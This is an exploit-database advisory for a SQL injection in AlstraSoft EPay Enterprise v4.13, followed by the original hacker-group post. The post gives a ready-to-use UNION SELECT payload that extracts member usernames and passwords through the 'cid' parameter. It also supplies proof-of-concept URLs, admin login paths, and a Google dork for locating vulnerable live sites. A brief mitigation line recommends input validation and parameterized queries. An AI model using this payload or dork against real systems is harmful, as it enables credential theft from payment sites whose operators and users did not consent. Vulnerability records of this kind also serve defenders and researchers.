EPay Enterprise v4.13 (cid) SQL Injection Vulnerability

vendor:

EPay Enterprise

by:

v3n0m

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: EPay Enterprise

Affected Version From: 4.13

Affected Version To: 4.13

Patch Exists: NO

Related CWE: N/A

CPE: a:alstrasoft:epay_enterprise

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

EPay Enterprise v4.13 (cid) SQL Injection Vulnerability

A vulnerability exists in AlstraSoft EPay Enterprise v4.13, which allows an attacker to inject arbitrary SQL commands via the 'cid' parameter in shop.htm and shop.php. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.

Source

Exploit-DB raw data:

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
										.WEB.ID
-----------------------------------------------------------------------
        EPay Enterprise v4.13 (cid) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://yogyacarderlink.web.id/
Date		: April, 23-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: AlstraSoft EPay Enterprise
Vendor  	: http://www.alstrasoft.com/
Price		: $240 USD
Google Dork	: "Powered by EPay Enterprise" inurl:"shop.htm?cid=" inurl:"shop.php?cid="
Overview	:

EPay Enterprise has been developed by AlstraSoft with the growing demand 
for online payment processing business similar to Paypal and Stormpay.com.
----------------------------------------------------------------

Exploit:
~~~~~~~

-99999+union+all+select+all+null,null,group_concat(username,char(58),password)v3n0m+from+dp_members--

SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/shop.htm?cid=[SQLi]
http://127.0.0.1/[path]/shop.php?cid=[SQLi]


Default Admin Login Page:
~~~~~~~~~~~~~~
http://127.0.0.1/[path]/admins/login.php
http://127.0.0.1/[path]/admins/login.htm
----------------------------------------------------------------

Shoutz:
~~~~

- 'You getz angry to me c'z you dunno what i did :( '
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,c4uR [caur sekarang berubah,ga pernah bw martabak lagi :(],mywisdom,yadoy666,udhit
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- elicha cristia [Mizz You...Mizz You...Mizz You... :)]
- N.O.C & Technical Support @office
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~

v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
Homepage: http://yogyacarderlink.web.id/
	  http://v3n0m.blogdetik.com/
	  http://elich4.blogspot.com/ << Update donk >_<

---------------------------[EOF]--------------------------------